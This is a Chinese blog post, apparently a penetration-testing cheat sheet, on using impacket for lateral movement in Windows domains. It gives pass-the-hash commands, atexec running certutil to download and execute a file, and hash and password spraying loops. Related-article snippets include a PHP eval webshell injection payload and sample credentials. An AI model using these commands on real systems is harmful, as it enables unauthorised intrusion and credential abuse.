impacket的使用总结

最新推荐文章于 2025-03-20 18:10:29 发布
最新推荐文章于 2025-03-20 18:10:29 发布
阅读量10w+ 收藏 14
点赞数 3
分类专栏: 内网渗透 横向移动 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/108253531
版权
本文详细介绍如何使用impacket工具进行网络渗透测试,包括下载地址、smbexec、wmiexec、psexec等模块的使用方法,以及通过atexec模块进行文件下载与远程命令执行的技巧。此外,还讲解了hash喷洒攻击、黄金票据制作与使用,以及在Linux环境中获取票据的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

impacket下载地址

exe版本下载地址
python版本下载地址

smbexec

./smbexec.py test/administrator@192.168.23.99 -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 #左面是lm-hash,右边是nt-hash,lmhash可以为空
./smbexec.py -hashes :3dbde697d71690a769204beb12283678 test/administrator@192.168.23.99
./smbexec.py test/administrator:123@192.168.23.99
在这里插入图片描述

wmiexec

./wmiexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/administrator@172.16.99.146
在这里插入图片描述

psexec

./psexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/administrator@172.16.99.146

./psexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/administrator@192.168.124.136 -c /root/1.exe
在这里插入图片描述

文件下载与远程命令执行

./atexec.py test/administrator:1234@192.168.124.136 “certutil -urlcache -split -f http://192.168.124.136/1.exe 2.exe”

./atexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/administrator@192.168.124.136 1.exe

hash喷洒攻击

内网机器遍历做hash传递验证,ips.txt内容为内网ip,每段一条
FOR /F %i in (ips.txt) do atexec.exe -hashes :3dbde697d71690a769204beb12283678 ./administrator@%i whoami
在这里插入图片描述

指定主机ntlm hash遍历验证,hashes.txt为已知ntlm hash内容,每段一条
FOR /F %i in (hashes.txt) do atexec.exe -hashes %i ./administrator@192.168.23.99 whoami
在这里插入图片描述
文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"
在这里插入图片描述

内网机器遍历做密码验证,passwords.txt为已知密码内容,每段一条
FOR /F %i in (passwords.txt) do atexec.exe ./administrator:%i@192.168.23.99 whoami
在这里插入图片描述

指定主机密码遍历验证,ips.txt内容为内网ip,每段一条
FOR /F %i in (ips.txt) do atexec.exe ./administrator:123@%i whoami

在这里插入图片描述

制作黄金票据

请参看我的黄金票据的制作与使用这篇博客。

linux获取票据

python3 getST.py -dc-ip 172.24.1.99 -spn krbtgt/test.com@test.com test/zhujiayu:123

Impacket的应用与编程
CoderExtra的博客
08-13 186
Impacket是一款功能强大的Python库,为网络协议安全性研究和开发提供了丰富的支持。无论是对SMB协议还是NTLM协议的操作,Impacket都提供了简洁易用的接口。此外,它还有许多其他有用的工具和模块,可以满足不同场景下的需求。希望这篇文章能帮助你更好地了解和应用Impacket库。
【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控
HBohan的博客
10-23 1626
内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 【查看资料】 1、进去一看,典型的sql注入 2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>" into outfile 'C:
域横向批量at&schtasks&impacket 传递
mingyqf的博客
11-08 542
2008 r2 webserver 域内 web 服务器 本地管理员账号密码 :.\administraotr:admin!@#45 当前机器域用户密码 :god\webadmin:admin!@#45 ------------------------------------- 2003 x86 fileserver 域内文件服务器 本地管理员账号密码 : administrator : admin 当前机器域用户密码 :god\fileadmin : Admin12345 -----------...
impacket-Impacket是个使用网络协议进行工作的工具集合-python
06-18
impacket-Impacket是个使用网络协议进行工作的工具集合 什么是ImpacketImpacket 是一组用于处理网络协议的 Python 类。 Impacket 专注于提供对数据包和某些协议(例如 NMB、SMB1-3 和 MS-DCEPC)的低级编程访问协议实现本身。 数据包可以从头开始构建,也可以从原始数据中解析出来,面向对象的 API 使处理深层协议变得简单。 该库提供了一组工具作为可以在该库的上下文中完成的操作的示例。 可以在以下位置找到对某些工具的描述: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 具有哪些协议? 以太网,Linux“熟”捕获。 IP、TCP、UDP、ICMP、IGMP、ARP。 (IPv4 和 IPv6)NMB 和 SMB1/2/3(高级实现)。 DCE/RPC 版本 4 和 5,通过不同的传输:UDP(版本 4 专用)、TCP、SMB/TCP、SMB/NetBIO
域渗透工具推荐:impacket
anddddoooo的博客
03-20 979
请求文件中所有用户的 tgt,如果该用户设置了"不需要 kerberos 预身份验证",那么它将返回此用户的 tgt,此脚本提取出 tgt 的 Login Session Key 进行离线爆破烤票攻击。# 如果你指定 spn 参数,生成的是这个 spn 白银票据 st,如果你没有指定,则生成黄金票据,且需要提供 krbtgt 凭据。# 使用此脚本可以批量请求 spn,如果你指定一个包含用户名文件,他将请求你指定的用户下的 spn 的 st。# 导出之后,使用 hashcat 进行离线烤票。
Impacket官方使用指南
weixin_30877755的博客
04-09 2966
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
Impacket工具使用
qq_18811919的博客
02-22 4691
Impacket工具包使用
超详细Impacket官方使用指南
Javachichi的博客
01-30 3065
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。有关某些工具的说明,请访问:https://www.secureauth.com/labs/open-source-tools/impacket
impacket-examples-windows-master.zip
06-14
总结起来,Impacket-examples-windows-master.zip是一个宝贵的资源,它不仅提供了Impacket在Windows环境下的实例代码,也是一本活生生的网络协议实战手册,帮助安全社区更好地理解和利用网络协议来提高网络安全。...
Python网络协议处理库Impacket解析
总结而言,Impacket作为一个专门为网络协议提供底层编程访问的Python类库集合,为网络协议的研究与开发提供了一个强大的工具。它包含多个协议的实现,特别适用于需要精确控制网络通信的场景,如安全测试、网络工具...
Impacket:Python网络协议处理类集
总结以上内容,Impacket是一个功能强大的Python库,适用于网络协议的处理与实现。它提供了丰富的网络协议支持,并在网络安全领域得到了广泛应用。开发者可以通过这个库来构建和分析网络协议数据包,进行网络攻击和...
Python-impacketImpacket是个使用网络协议进行工作的工具集合
08-10
impacket-Impacket是个使用网络协议进行工作的工具集合
impacket, Impacket是用于处理网络协议的python 类的集合.zip
10-10
impacket, Impacket是用于处理网络协议的python 类的集合 什么是 ImpacketImpacket是用于处理网络协议的python 类的集合。 Impacket专注于为包提供底层编程访问,并针对某些协议实现( 。例如 NMB,SMB1-3和 ms dcerpc ) 协议本身。 包可以以从头开始
impacketImpacket是用于网络协议的Python类的集合
02-05
什么是ImpacketImpacket是用于网络协议的Python类的集合。 Impacket专注于提供对数据包的低级编程访问,并且对于某些协议(例如SMB1-3和MSRPC),协议实现本身。 数据包可以从头开始构建,也可以从原始数据中进行解析,而面向对象的API使处理协议深层次结构变得简单。 该库提供了一组工具,作为在该库的上下文中可以完成的操作的示例。 可以在以下找到一些工具的说明: : 有哪些协议? 以太网,Linux“ Cooked”捕获。 IP,TCP,UDP,ICMP,IGMP,ARP。 IPv4和IPv6支持。 NMB和SMB1,SMB2和SMB3(高级实现)
Impacket:一组用于处理网络协议的Python类-开源
04-25
Impacket是旨在用于网络协议的Python类的集合。 创建它的主要目的是希望减轻与实施网络协议和堆栈相关的障碍,并旨在加快研究和教育活动。 它提供了对数据包的低级编程访问,以及某些协议(例如SMB1-3和MSRPC)的协议实现本身。 它具有多种协议,包括以太网,IP,TCP,UDP,ICMP,IGMP,ARP,NMB和SMB1,SMB2和SMB3等。 Impacket的面向对象的API使处理协议的深层次结构变得容易。 它可以从头开始构造数据包,也可以从原始数据中解析它们。
impacket-0.9.9.9
05-05
impacket-0.9.9.9,官方版本
kali中impacket-smbrelayx:未找到命令
最新发布
03-31
总结可能的解决方案步骤:更新系统,安装依赖,从GitHub克隆Impacket仓库,使用pip安装,添加路径到环境变量,或者直接使用python3运行脚本。同时,检查是否有多个版本冲突,可能需要卸载旧版本。 需要验证每个步骤...
impacket安装 python_Python impacket包_程序模块 - PyPI - Python中文网
weixin_39565300的博客
12-23 758
什么是impacketimpacket是用于处理网络的python类的集合。协议。impacket专注于提供低水平的对数据包和某些协议(例如smb1-3和msrpc)协议实现本身。包可以从头开始构造,也可以从原始数据和面向对象的api使得使用协议的深层次。库提供了一组工具作为在这个库的上下文中可以做什么的例子。有哪些协议?以太网,Linux“煮熟”捕获。IP、TCP、UDP、ICMP、IGMP、...
2024年最全超详细Impacket官方使用指南(1),2024年最新2024HarmonyOS鸿蒙常见面试题分享
2401_84862386的博客
05-14 1295
对于ntlmrelayx.py你还需要安装ldapdomaindump,flask并ldap3如果你在Windows下,你将需要安装 pyReadline最近发布的Impacket安装为了安装源,请从解压缩Impacket包的目录中执行以下命令:pip install . 这将把类安装到默认的Python模块路径中;请注意,您可能需要特殊的权限才能在那里进行写入。有关setup.py中可用的命令和选项的详细信息,请运行python setup.py --help-commands。
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值